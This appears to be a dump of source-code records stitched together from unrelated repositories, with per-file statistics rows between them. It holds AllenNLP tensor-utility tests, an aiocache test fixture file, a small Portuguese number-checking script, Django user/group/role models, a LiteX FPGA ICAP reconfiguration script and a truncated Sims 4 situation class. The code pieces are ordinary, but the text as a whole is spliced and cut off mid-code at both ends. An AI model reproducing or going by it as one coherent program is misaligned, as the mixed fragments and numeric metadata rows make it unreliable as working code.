[[1, 2, 3, 4], [5, 5, 5, 5], [6, 8, 1, 2]],
[[4, 3, 2, 1], [8, 7, 6, 5], [0, 0, 0, 0]],
]
)
)
mask = (tensor > 0).sum(dim=-1) > 0
bos = torch.from_numpy(numpy.array([9, 9, 9, 9]))
eos = torch.from_numpy(numpy.array([10, 10, 10, 10]))
new_tensor, new_mask = util.add_sentence_boundary_token_ids(tensor, mask, bos, eos)
expected_new_tensor = numpy.array(
[
[[9, 9, 9, 9], [1, 2, 3, 4], [5, 5, 5, 5], [6, 8, 1, 2], [10, 10, 10, 10]],
[[9, 9, 9, 9], [4, 3, 2, 1], [8, 7, 6, 5], [10, 10, 10, 10], [0, 0, 0, 0]],
]
)
assert (new_tensor.data.numpy() == expected_new_tensor).all()
assert (new_mask.data.numpy() == ((expected_new_tensor > 0).sum(axis=-1) > 0)).all()
def test_remove_sentence_boundaries(self):
tensor = torch.from_numpy(numpy.random.rand(3, 5, 7))
mask = torch.from_numpy(
# The mask with two elements is to test the corner case
# of an empty sequence, so here we are removing boundaries
# from "<S> </S>"
numpy.array([[1, 1, 0, 0, 0], [1, 1, 1, 1, 1], [1, 1, 1, 1, 0]])
).bool()
new_tensor, new_mask = util.remove_sentence_boundaries(tensor, mask)
expected_new_tensor = torch.zeros(3, 3, 7)
expected_new_tensor[1, 0:3, :] = tensor[1, 1:4, :]
expected_new_tensor[2, 0:2, :] = tensor[2, 1:3, :]
assert_array_almost_equal(new_tensor.data.numpy(), expected_new_tensor.data.numpy())
expected_new_mask = torch.from_numpy(numpy.array([[0, 0, 0], [1, 1, 1], [1, 1, 0]])).bool()
assert (new_mask.data.numpy() == expected_new_mask.data.numpy()).all()
def test_add_positional_features(self):
# This is hard to test, so we check that we get the same result as the
# original tensorflow implementation:
# https://github.com/tensorflow/tensor2tensor/blob/master/tensor2tensor/layers/common_attention.py#L270
tensor2tensor_result = numpy.asarray(
[
[0.00000000e00, 0.00000000e00, 1.00000000e00, 1.00000000e00],
[8.41470957e-01, 9.99999902e-05, 5.40302277e-01, 1.00000000e00],
[9.09297407e-01, 1.99999980e-04, -4.16146845e-01, 1.00000000e00],
]
)
tensor = torch.zeros([2, 3, 4])
result = util.add_positional_features(tensor, min_timescale=1.0, max_timescale=1.0e4)
numpy.testing.assert_almost_equal(result[0].detach().cpu().numpy(), tensor2tensor_result)
numpy.testing.assert_almost_equal(result[1].detach().cpu().numpy(), tensor2tensor_result)
# Check case with odd number of dimensions.
tensor2tensor_result = numpy.asarray(
[
[
0.00000000e00,
0.00000000e00,
0.00000000e00,
1.00000000e00,
1.00000000e00,
1.00000000e00,
0.00000000e00,
],
[
8.41470957e-01,
9.99983307e-03,
9.99999902e-05,
5.40302277e-01,
9.99949992e-01,
1.00000000e00,
0.00000000e00,
],
[
9.09297407e-01,
1.99986659e-02,
1.99999980e-04,
-4.16146815e-01,
9.99800026e-01,
1.00000000e00,
0.00000000e00,
],
]
)
tensor = torch.zeros([2, 3, 7])
result = util.add_positional_features(tensor, min_timescale=1.0, max_timescale=1.0e4)
numpy.testing.assert_almost_equal(result[0].detach().cpu().numpy(), tensor2tensor_result)
numpy.testing.assert_almost_equal(result[1].detach().cpu().numpy(), tensor2tensor_result)
def test_combine_tensors_and_multiply(self):
tensors = [torch.Tensor([[[2, 3]]]), torch.Tensor([[[5, 5]]])]
weight = torch.Tensor([4, 5])
combination = "x"
assert_almost_equal(
util.combine_tensors_and_multiply(combination, tensors, weight), [[8 + 15]]
)
combination = "y"
assert_almost_equal(
util.combine_tensors_and_multiply(combination, tensors, weight), [[20 + 25]]
)
combination = "x,y"
weight2 = torch.Tensor([4, 5, 4, 5])
assert_almost_equal(
util.combine_tensors_and_multiply(combination, tensors, weight2), [[8 + 20 + 15 + 25]]
)
combination = "x-y"
assert_almost_equal(
util.combine_tensors_and_multiply(combination, tensors, weight), [[-3 * 4 + -2 * 5]]
)
combination = "y-x"
assert_almost_equal(
util.combine_tensors_and_multiply(combination, tensors, weight), [[3 * 4 + 2 * 5]]
)
combination = "y+x"
assert_almost_equal(
util.combine_tensors_and_multiply(combination, tensors, weight), [[7 * 4 + 8 * 5]]
)
combination = "y*x"
assert_almost_equal(
util.combine_tensors_and_multiply(combination, tensors, weight), [[10 * 4 + 15 * 5]]
)
combination = "y/x"
assert_almost_equal(
util.combine_tensors_and_multiply(combination, tensors, weight),
[[(5 / 2) * 4 + (5 / 3) * 5]],
decimal=4,
)
combination = "x/y"
assert_almost_equal(
util.combine_tensors_and_multiply(combination, tensors, weight),
[[(2 / 5) * 4 + (3 / 5) * 5]],
decimal=4,
)
with pytest.raises(ConfigurationError):
util.combine_tensors_and_multiply("x+y+y", tensors, weight)
with pytest.raises(ConfigurationError):
util.combine_tensors_and_multiply("x%y", tensors, weight)
def test_combine_tensors_and_multiply_with_same_batch_size_and_embedding_dim(self):
# This test just makes sure we handle some potential edge cases where the lengths of all
# dimensions are the same, making sure that the multiplication with the weight vector
# happens along the right dimension (it should be the last one).
tensors = [torch.Tensor([[[5, 5], [4, 4]], [[2, 3], [1, 1]]])] # (2, 2, 2)
weight = torch.Tensor([4, 5]) # (2,)
combination = "x"
assert_almost_equal(
util.combine_tensors_and_multiply(combination, tensors, weight),
[[20 + 25, 16 + 20], [8 + 15, 4 + 5]],
)
tensors = [
torch.Tensor([[[5, 5], [2, 2]], [[4, 4], [3, 3]]]),
torch.Tensor([[[2, 3]], [[1, 1]]]),
]
weight = torch.Tensor([4, 5])
combination = "x*y"
assert_almost_equal(
util.combine_tensors_and_multiply(combination, tensors, weight),
[
[5 * 2 * 4 + 5 * 3 * 5, 2 * 2 * 4 + 2 * 3 * 5],
[4 * 1 * 4 + 4 * 1 * 5, 3 * 1 * 4 + 3 * 1 * 5],
],
)
def test_combine_tensors_and_multiply_with_batch_size_one(self):
seq_len_1 = 10
seq_len_2 = 5
embedding_dim = 8
combination = "x,y,x*y"
t1 = torch.randn(1, seq_len_1, embedding_dim)
t2 = torch.randn(1, seq_len_2, embedding_dim)
combined_dim = util.get_combined_dim(combination, [embedding_dim, embedding_dim])
weight = torch.Tensor(combined_dim)
result = util.combine_tensors_and_multiply(
combination, [t1.unsqueeze(2), t2.unsqueeze(1)], weight
)
assert_almost_equal(result.size(), [1, seq_len_1, seq_len_2])
def test_combine_tensors_and_multiply_with_batch_size_one_and_seq_len_one(self):
seq_len_1 = 10
seq_len_2 = 1
embedding_dim = 8
combination = "x,y,x*y"
t1 = torch.randn(1, seq_len_1, embedding_dim)
t2 = torch.randn(1, seq_len_2, embedding_dim)
combined_dim = util.get_combined_dim(combination, [embedding_dim, embedding_dim])
weight = torch.Tensor(combined_dim)
result = util.combine_tensors_and_multiply(
combination, [t1.unsqueeze(2), t2.unsqueeze(1)], weight
)
assert_almost_equal(result.size(), [1, seq_len_1, seq_len_2])
def test_has_tensor(self):
has_tensor = util.has_tensor
tensor = torch.tensor([1, 2, 3])
assert has_tensor(["a", 10, tensor])
assert not has_tensor(["a", 10])
assert has_tensor(("a", 10, tensor))
assert not has_tensor(("a", 10))
assert has_tensor({"a": tensor, "b": 1})
assert not has_tensor({"a": 10, "b": 1})
assert has_tensor(tensor)
assert not has_tensor(3)
assert has_tensor({"x": [0, {"inside": {"double_inside": [3, [10, tensor]]}}]})
def test_combine_initial_dims(self):
tensor = torch.randn(4, 10, 20, 17, 5)
tensor2d = util.combine_initial_dims(tensor)
assert list(tensor2d.size()) == [4 * 10 * 20 * 17, 5]
def test_uncombine_initial_dims(self):
embedding2d = torch.randn(4 * 10 * 20 * 17 * 5, 12)
embedding = util.uncombine_initial_dims(embedding2d, torch.Size((4, 10, 20, 17, 5)))
assert list(embedding.size()) == [4, 10, 20, 17, 5, 12]
def test_inspect_model_parameters(self):
model_archive = str(
self.FIXTURES_ROOT / "decomposable_attention" / "serialization" / "model.tar.gz"
)
parameters_inspection = str(
self.FIXTURES_ROOT / "decomposable_attention" / "parameters_inspection.json"
)
model = load_archive(model_archive).model
with open(parameters_inspection) as file:
parameters_inspection_dict = json.load(file)
assert parameters_inspection_dict == util.inspect_parameters(model)
def test_move_to_device(self):
# We're faking the tensor here so that we can test the calls to .cuda() without actually
# needing a GPU.
class FakeTensor(torch.Tensor):
def __init__(self):
self._device = None
def cuda(self, device):
self._device = device
return self
class A(NamedTuple):
a: int
b: torch.Tensor
structured_obj = {
"a": [A(1, FakeTensor()), A(2, FakeTensor())],
"b": FakeTensor(),
"c": (1, FakeTensor()),
}
new_device = 4
moved_obj = util.move_to_device(structured_obj, new_device)
assert moved_obj["a"][0].a == 1
assert moved_obj["a"][0].b._device == new_device
assert moved_obj["a"][1].b._device == new_device
assert moved_obj["b"]._device == new_device
assert moved_obj["c"][0] == 1
assert moved_obj["c"][1]._device == new_device
def test_extend_layer(self):
lin_layer = torch.nn.Linear(10, 5)
new_dim = 8
old_weights = lin_layer.weight.data.clone()
old_bias = lin_layer.bias.data.clone()
util.extend_layer(lin_layer, new_dim)
assert lin_layer.weight.data.shape == (8, 10)
assert lin_layer.bias.data.shape == (8,)
assert (lin_layer.weight.data[:5] == old_weights).all()
assert (lin_layer.bias.data[:5] == old_bias).all()
assert lin_layer.out_features == new_dim
def test_masked_topk_selects_top_scored_items_and_respects_masking(self):
items = torch.randn([3, 4, 5]).clamp(min=0.0, max=1.0)
items[0, :2, :] = 1
items[1, 2:, :] = 1
items[2, 2:, :] = 1
scores = items.sum(-1)
mask = torch.ones([3, 4]).bool()
mask[1, 0] = 0
mask[1, 3] = 0
pruned_scores, pruned_mask, pruned_indices = util.masked_topk(scores, mask, 2)
# Second element in the batch would have indices 2, 3, but
# 3 and 0 are masked, so instead it has 1, 2.
numpy.testing.assert_array_equal(
pruned_indices.data.numpy(), numpy.array([[0, 1], [1, 2], [2, 3]])
)
numpy.testing.assert_array_equal(pruned_mask.data.numpy(), numpy.ones([3, 2]))
# scores should be the result of index_selecting the pruned_indices.
correct_scores = util.batched_index_select(scores.unsqueeze(-1), pruned_indices).squeeze(-1)
self.assert_array_equal_with_mask(correct_scores, pruned_scores, pruned_mask)
def test_masked_topk_works_for_completely_masked_rows(self):
items = torch.randn([3, 4, 5]).clamp(min=0.0, max=1.0)
items[0, :2, :] = 1
items[1, 2:, :] = 1
items[2, 2:, :] = 1
scores = items.sum(-1)
mask = torch.ones([3, 4]).bool()
mask[1, 0] = 0
mask[1, 3] = 0
mask[2, :] = 0 # fully masked last batch element.
pruned_scores, pruned_mask, pruned_indices = util.masked_topk(scores, mask, 2)
# We can't check the last row here, because it's completely masked.
# Instead we'll check that the scores for these elements are very small.
numpy.testing.assert_array_equal(
pruned_indices[:2].data.numpy(), numpy.array([[0, 1], [1, 2]])
)
numpy.testing.assert_array_equal(
pruned_mask.data.numpy(), numpy.array([[1, 1], [1, 1], [0, 0]])
)
# scores should be the result of index_selecting the pruned_indices.
correct_scores = util.batched_index_select(scores.unsqueeze(-1), pruned_indices).squeeze(-1)
self.assert_array_equal_with_mask(correct_scores, pruned_scores, pruned_mask)
def test_masked_topk_selects_top_scored_items_and_respects_masking_different_num_items(self):
items = torch.randn([3, 4, 5]).clamp(min=0.0, max=1.0)
items[0, 0, :] = 1.5
items[0, 1, :] = 2
items[0, 3, :] = 1
items[1, 1:3, :] = 1
items[2, 0, :] = 1
items[2, 1, :] = 2
items[2, 2, :] = 1.5
scores = items.sum(-1)
mask = torch.ones([3, 4]).bool()
mask[1, 3] = 0
k = torch.tensor([3, 2, 1], dtype=torch.long)
pruned_scores, pruned_mask, pruned_indices = util.masked_topk(scores, mask, k)
# Second element in the batch would have indices 2, 3, but
# 3 and 0 are masked, so instead it has 1, 2.
numpy.testing.assert_array_equal(
pruned_indices.data.numpy(), numpy.array([[0, 1, 3], [1, 2, 2], [1, 2, 2]])
)
numpy.testing.assert_array_equal(
pruned_mask.data.numpy(), numpy.array([[1, 1, 1], [1, 1, 0], [1, 0, 0]])
)
# scores should be the result of index_selecting the pruned_indices.
correct_scores = util.batched_index_select(scores.unsqueeze(-1), pruned_indices).squeeze(-1)
self.assert_array_equal_with_mask(correct_scores, pruned_scores, pruned_mask)
def test_masked_topk_works_for_row_with_no_items_requested(self):
# Case where `num_items_to_keep` is a tensor rather than an int. Make sure it does the right
# thing when no items are requested for one of the rows.
items = torch.randn([3, 4, 5]).clamp(min=0.0, max=1.0)
items[0, :3, :] = 1
items[1, 2:, :] = 1
items[2, 2:, :] = 1
scores = items.sum(-1)
mask = torch.ones([3, 4]).bool()
mask[1, 0] = 0
mask[1, 3] = 0
k = torch.tensor([3, 2, 0], dtype=torch.long)
pruned_scores, pruned_mask, pruned_indices = util.masked_topk(scores, mask, k)
# First element just picks top three entries. Second would pick entries 2 and 3, but 0 and 3
# are masked, so it takes 1 and 2 (repeating the second index). The third element is
# entirely masked and just repeats the largest index with a top-3 score.
numpy.testing.assert_array_equal(
pruned_indices.data.numpy(), numpy.array([[0, 1, 2], [1, 2, 2], [3, 3, 3]])
)
numpy.testing.assert_array_equal(
pruned_mask.data.numpy(), numpy.array([[1, 1, 1], [1, 1, 0], [0, 0, 0]])
)
# scores should be the result of index_selecting the pruned_indices.
correct_scores = util.batched_index_select(scores.unsqueeze(-1), pruned_indices).squeeze(-1)
self.assert_array_equal_with_mask(correct_scores, pruned_scores, pruned_mask)
def test_masked_topk_works_for_multiple_dimensions(self):
# fmt: off
items = torch.FloatTensor([ # (3, 2, 5)
[[4, 2, 9, 9, 7], [-4, -2, -9, -9, -7]],
[[5, 4, 1, 8, 8], [9, 1, 7, 4, 1]],
[[9, 8, 9, 6, 0], [2, 2, 2, 2, 2]],
]).unsqueeze(-1).expand(3, 2, 5, 4)
mask = torch.tensor([
[[False, False, False, False, False], [True, True, True, True, True]],
[[True, True, True, True, False], [False, True, True, True, True]],
[[True, False, True, True, True], [False, True, False, True, True]],
]).unsqueeze(-1).expand(3, 2, 5, 4)
# This is the same as just specifying a scalar int, but we want to test this behavior
k = torch.ones(3, 5, 4, dtype=torch.long)
k[1, 3, :] = 2
target_items = torch.FloatTensor([
[[-4, -2, -9, -9, -7], [0, 0, 0, 0, 0]],
[[5, 4, 7, 8, 1], [0, 0, 0, 4, 0]],
[[9, 2, 9, 6, 2], [0, 0, 0, 0, 0]],
]).unsqueeze(-1).expand(3, 2, 5, 4)
target_mask = torch.ones(3, 2, 5, 4, dtype=torch.bool)
target_mask[:, 1, :, :] = 0
target_mask[1, 1, 3, :] = 1
target_indices = torch.LongTensor([
[[1, 1, 1, 1, 1], [0, 0, 0, 0, 0]],
[[0, 0, 1, 0, 1], [0, 0, 0, 1, 0]],
[[0, 1, 0, 0, 1], [0, 0, 0, 0, 0]],
]).unsqueeze(-1).expand(3, 2, 5, 4)
# fmt: on
pruned_items, pruned_mask, pruned_indices = util.masked_topk(items, mask, k, dim=1)
numpy.testing.assert_array_equal(pruned_mask.data.numpy(), target_mask.data.numpy())
self.assert_array_equal_with_mask(pruned_items, target_items, pruned_mask)
self.assert_array_equal_with_mask(pruned_indices, target_indices, pruned_mask)
def assert_array_equal_with_mask(self, a, b, mask):
numpy.testing.assert_array_equal((a * mask).data.numpy(), (b * mask).data.numpy())
def test_tensors_equal(self):
# Basic
assert util.tensors_equal(torch.tensor([1]), torch.tensor([1]))
assert not util.tensors_equal(torch.tensor([1]), torch.tensor([2]))
# Bool
assert util.tensors_equal(torch.tensor([True]), torch.tensor([True]))
# Cross dtype
assert util.tensors_equal(torch.tensor([1]), torch.tensor([1.0]))
assert util.tensors_equal(torch.tensor([1]), torch.tensor([True]))
# Containers
assert util.tensors_equal([torch.tensor([1])], [torch.tensor([1])])
assert not util.tensors_equal([torch.tensor([1])], [torch.tensor([2])])
assert util.tensors_equal({"key": torch.tensor([1])}, {"key": torch.tensor([1])})
| 44.1418 | 111 | 0.58091 | 9,793 | 71,598 | 4.065251 | 0.063106 | 0.017935 | 0.015373 | 0.01055 | 0.755269 | 0.721358 | 0.691944 | 0.665695 | 0.64231 | 0.614202 | 0 | 0.076833 | 0.280874 | 71,598 | 1,621 | 112 | 44.169031 | 0.696376 | 0.109416 | 0 | 0.465643 | 0 | 0 | 0.005459 | 0.001101 | 0 | 0 | 0 | 0 | 0.154406 | 1 | 0.050121 | false | 0.000808 | 0.010509 | 0 | 0.064673 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
8a3cbbc7fd1c54f45bbdf7b34e3c92733082359d | 2,280 | py | Python | tests/ut/conftest.py | rspadim/aiocache | bf675ae912173bee25cc1d8c22b77f57de34375d | [
"BSD-3-Clause"
] | 213 | 2020-11-02T14:29:46.000Z | 2022-03-24T23:12:32.000Z | tests/ut/conftest.py | rspadim/aiocache | bf675ae912173bee25cc1d8c22b77f57de34375d | [
"BSD-3-Clause"
] | 48 | 2020-11-02T11:17:13.000Z | 2022-03-24T17:55:31.000Z | tests/ut/conftest.py | rspadim/aiocache | bf675ae912173bee25cc1d8c22b77f57de34375d | [
"BSD-3-Clause"
] | 49 | 2020-11-13T07:41:37.000Z | 2022-03-25T12:24:49.000Z | import pytest
import asynctest
from aiocache.base import BaseCache, API
from aiocache import caches, RedisCache, MemcachedCache
from aiocache.plugins import BasePlugin
from aiocache.serializers import BaseSerializer
def pytest_configure():
"""
Before pytest_namespace was being used to set the keys for
testing but the feature was removed
https://docs.pytest.org/en/latest/deprecations.html#pytest-namespace
"""
pytest.KEY = "key"
pytest.KEY_1 = "random"
@pytest.fixture(autouse=True)
def reset_caches():
caches.set_config(
{
"default": {
"cache": "aiocache.SimpleMemoryCache",
"serializer": {"class": "aiocache.serializers.NullSerializer"},
}
}
)
class MockCache(BaseCache):
def __init__(self):
super().__init__()
self._add = asynctest.CoroutineMock()
self._get = asynctest.CoroutineMock()
self._gets = asynctest.CoroutineMock()
self._set = asynctest.CoroutineMock()
self._multi_get = asynctest.CoroutineMock(return_value=["a", "b"])
self._multi_set = asynctest.CoroutineMock()
self._delete = asynctest.CoroutineMock()
self._exists = asynctest.CoroutineMock()
self._increment = asynctest.CoroutineMock()
self._expire = asynctest.CoroutineMock()
self._clear = asynctest.CoroutineMock()
self._raw = asynctest.CoroutineMock()
self._redlock_release = asynctest.CoroutineMock()
self.acquire_conn = asynctest.CoroutineMock()
self.release_conn = asynctest.CoroutineMock()
self._close = asynctest.CoroutineMock()
@pytest.fixture
def mock_cache(mocker):
cache = MockCache()
cache.timeout = 0.002
mocker.spy(cache, "_build_key")
for cmd in API.CMDS:
mocker.spy(cache, cmd.__name__)
mocker.spy(cache, "close")
cache.serializer = asynctest.Mock(spec=BaseSerializer)
cache.serializer.encoding = "utf-8"
cache.plugins = [asynctest.Mock(spec=BasePlugin)]
return cache
@pytest.fixture
def base_cache():
return BaseCache()
@pytest.fixture
def redis_cache():
cache = RedisCache()
return cache
@pytest.fixture
def memcached_cache():
cache = MemcachedCache()
return cache
| 27.804878 | 79 | 0.675 | 238 | 2,280 | 6.285714 | 0.390756 | 0.235294 | 0.243316 | 0.03877 | 0.036096 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003365 | 0.217982 | 2,280 | 81 | 80 | 28.148148 | 0.83567 | 0.071491 | 0 | 0.114754 | 0 | 0 | 0.056856 | 0.029145 | 0 | 0 | 0 | 0 | 0 | 1 | 0.114754 | false | 0 | 0.098361 | 0.016393 | 0.295082 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
8a45222032afc0d45b3704fce040bfb9e95e4f75 | 179 | py | Python | aioffsend/__init__.py | Chenwe-i-lin/aioffsend | fb4a9070042d91de2f929b4c298310766d0377f7 | [
"MIT"
] | null | null | null | aioffsend/__init__.py | Chenwe-i-lin/aioffsend | fb4a9070042d91de2f929b4c298310766d0377f7 | [
"MIT"
] | null | null | null | aioffsend/__init__.py | Chenwe-i-lin/aioffsend | fb4a9070042d91de2f929b4c298310766d0377f7 | [
"MIT"
] | null | null | null | from .highlevel import (
upload,
delete,
download,
set_params,
get_metadata,
get_owner_info
)
from .midlevel import FFSend
from .lowlevel import FFSendAPI | 16.272727 | 31 | 0.703911 | 21 | 179 | 5.809524 | 0.761905 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.240223 | 179 | 11 | 31 | 16.272727 | 0.897059 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.3 | 0 | 0.3 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
8a490534731ba006b0b50ab404eae70a803214f3 | 1,068 | py | Python | Set-14-2021/tarefa.py | gianbianchi/Uniso | 3abd036bde0b9d9e02ae4f95bae10af4f0a0bae7 | [
"MIT"
] | null | null | null | Set-14-2021/tarefa.py | gianbianchi/Uniso | 3abd036bde0b9d9e02ae4f95bae10af4f0a0bae7 | [
"MIT"
] | null | null | null | Set-14-2021/tarefa.py | gianbianchi/Uniso | 3abd036bde0b9d9e02ae4f95bae10af4f0a0bae7 | [
"MIT"
] | null | null | null | n1 = int(input("Digite n1: "))
n2 = int(input("Digite n2: "))
if (n2 == 0):
print("Não é possível dividir por zero.")
if (n1 % 3 == 0 and n1 % 5 == 0):
print("O número n1 = {} é divisível por 3 e 5.".format(n1))
else:
print("O número n1 = {} não é divisível por 3 e 5 ao mesmo tempo".format(n1))
if (n2 % 3 == 0 and n2 % 5 == 0):
print("O número n2 = {} é divisível por 3 e 5.".format(n2))
else:
print("O número n2 = {} não é divisível por 3 e 5 ao mesmo tempo".format(n2))
if (n1 > 0):
print("O número n1 = {} é positivo".format(n1))
if (n1 % 4 == 0):
print("e divisível por 4")
elif (n1 < 0):
print("O número n1 = {} é negativo".format(n1))
if (n1 % 4 == 0):
print("e divisível por 4")
else:
print("O número n1 é zero.")
if (n2 > 0):
print("O número n2 = {} é positivo".format(n2))
if (n2 % 4 == 0):
print("e divisível por 4")
elif (n2 < 0):
print("O número n2 = {} é negativo".format(n2))
if (n2 % 4 == 0):
print("e divisível por 4")
else:
print("O número n2 é zero.") | 28.864865 | 81 | 0.544944 | 188 | 1,068 | 3.095745 | 0.159574 | 0.113402 | 0.206186 | 0.134021 | 0.749141 | 0.67354 | 0.621993 | 0.42268 | 0.408935 | 0.408935 | 0 | 0.087404 | 0.271536 | 1,068 | 37 | 82 | 28.864865 | 0.660668 | 0 | 0 | 0.375 | 0 | 0 | 0.430309 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.46875 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
8a4c7b9da8478218612fb444dc54b52b37aeddbd | 2,574 | py | Python | users/models.py | itimor/weekReport | 6da9bb93de1df8195f87d9e032ae31968c95a7c3 | [
"MIT"
] | 3 | 2018-03-01T10:08:23.000Z | 2020-03-31T09:58:41.000Z | users/models.py | itimor/weekReport | 6da9bb93de1df8195f87d9e032ae31968c95a7c3 | [
"MIT"
] | null | null | null | users/models.py | itimor/weekReport | 6da9bb93de1df8195f87d9e032ae31968c95a7c3 | [
"MIT"
] | 4 | 2018-07-31T12:14:29.000Z | 2020-10-21T06:41:36.000Z | # -*- coding: utf-8 -*-
# author: itimor
from django.db import models
from django.contrib.auth.models import BaseUserManager, AbstractBaseUser
class UserManager(BaseUserManager):
def create_user(self, username, password=None):
'''username 是唯一标识,没有会报错'''
if not username:
raise ValueError('Users must have an username')
user = self.model(
username=username,
)
user.set_password(password) # 设置密码
user.save(using=self._db) # 保存密码
return user
def create_superuser(self, username, password):
user = self.create_user(username=username,
password=password,
)
user.is_admin = True # 比创建用户多的一个字段
user.save(using=self._db)
return user
class User(AbstractBaseUser):
username = models.CharField(max_length=32, unique=True, db_index=True)
email = models.EmailField(max_length=255, unique=True, blank=True)
name = models.CharField(max_length=100, null=True, blank=True, verbose_name=u'中文名')
group = models.ForeignKey('Group', on_delete=models.SET_NULL, null=True, blank=True, verbose_name=u'部门或组')
create_date = models.DateField(auto_now=True, verbose_name=u'创建时间')
is_active = models.BooleanField(default=True)
is_admin = models.BooleanField(default=False)
roles = models.ForeignKey('Role', on_delete=models.SET_NULL, null=True, blank=True, verbose_name=u'角色')
USERNAME_FIELD = 'username' # 必须有一个唯一标识--USERNAME_FIELD
#REQUIRED_FIELDS = ['email'] # 创建superuser时的必须字段
def __str__(self): # __unicode__ on Python 2
return self.username
@property
def is_staff(self):
return self.is_admin
class Meta:
verbose_name = u'用户'
verbose_name_plural = u'用户'
objects = UserManager() # 创建用户
class Group(models.Model):
name = models.CharField(max_length=64, unique=True, verbose_name=u'部门')
desc = models.CharField(max_length=64, null=True, blank=True, verbose_name=u'描述')
def __str__(self):
return self.name
class Meta:
verbose_name = u'组'
verbose_name_plural = u'部门'
class Role(models.Model):
name = models.CharField(max_length=64, unique=True, verbose_name=u'角色')
cnname = models.CharField(max_length=64, unique=True, verbose_name=u'中文名')
desc = models.CharField(max_length=64, null=True, blank=True, verbose_name=u'描述')
def __str__(self):
return self.name
class Meta:
verbose_name = u'角色'
verbose_name_plural = u'角色' | 33.428571 | 110 | 0.663559 | 329 | 2,574 | 5 | 0.303951 | 0.100304 | 0.087538 | 0.087538 | 0.372036 | 0.31307 | 0.31307 | 0.295441 | 0.295441 | 0.295441 | 0 | 0.01004 | 0.226107 | 2,574 | 77 | 111 | 33.428571 | 0.815763 | 0.070707 | 0 | 0.254545 | 0 | 0 | 0.033221 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.109091 | false | 0.072727 | 0.036364 | 0.072727 | 0.654545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
8a4d4e1ecd7f4e0e93ca7f5da0137f260149deaf | 314 | py | Python | test/test_icap.py | antmicro/netv2 | f49e0635d197e381c4a5cce8dd9816962a519a48 | [
"Net-SNMP",
"Xnet"
] | null | null | null | test/test_icap.py | antmicro/netv2 | f49e0635d197e381c4a5cce8dd9816962a519a48 | [
"Net-SNMP",
"Xnet"
] | 4 | 2020-08-18T18:29:38.000Z | 2021-01-25T21:31:25.000Z | test/test_icap.py | antmicro/netv2 | f49e0635d197e381c4a5cce8dd9816962a519a48 | [
"Net-SNMP",
"Xnet"
] | null | null | null | #!/usr/bin/env python3
from litex import RemoteClient
wb = RemoteClient()
wb.open()
# # #
def icap_send(addr, data):
wb.regs.icap_addr.write(addr)
wb.regs.icap_data.write(data)
wb.regs.icap_send.write(1)
while (wb.regs.icap_done.read() == 0):
pass
# iprog
icap_send(0x04, 0x0000000f)
# # #
wb.close()
| 13.652174 | 39 | 0.687898 | 50 | 314 | 4.2 | 0.54 | 0.114286 | 0.190476 | 0.133333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052045 | 0.143312 | 314 | 22 | 40 | 14.272727 | 0.728625 | 0.092357 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.050909 | 0 | 0 | 1 | 0.090909 | false | 0.090909 | 0.090909 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
8a4dee86ca5dfb4dc02ea1a613fe4540eb4f1125 | 1,553 | py | Python | S4/S4 Library/simulation/situations/complex/suntanner_situation.py | NeonOcean/Environment | ca658cf66e8fd6866c22a4a0136d415705b36d26 | [
"CC-BY-4.0"
] | 1 | 2021-05-20T19:33:37.000Z | 2021-05-20T19:33:37.000Z | S4/S4 Library/simulation/situations/complex/suntanner_situation.py | NeonOcean/Environment | ca658cf66e8fd6866c22a4a0136d415705b36d26 | [
"CC-BY-4.0"
] | null | null | null | S4/S4 Library/simulation/situations/complex/suntanner_situation.py | NeonOcean/Environment | ca658cf66e8fd6866c22a4a0136d415705b36d26 | [
"CC-BY-4.0"
] | null | null | null | from sims4.tuning.tunable_base import GroupNames
from situations.complex.give_job_object_situation_mixin import GiveJobObjectSituationMixin
from situations.situation import Situation
from situations.situation_complex import SituationComplexCommon, CommonSituationState, SituationStateData, TunableSituationJobAndRoleState
import sims4
logger = sims4.log.Logger('SuntannerSituation', default_owner='msundaram')
class _SuntannerSituationState(CommonSituationState):
pass
class SuntannerSituation(GiveJobObjectSituationMixin, SituationComplexCommon):
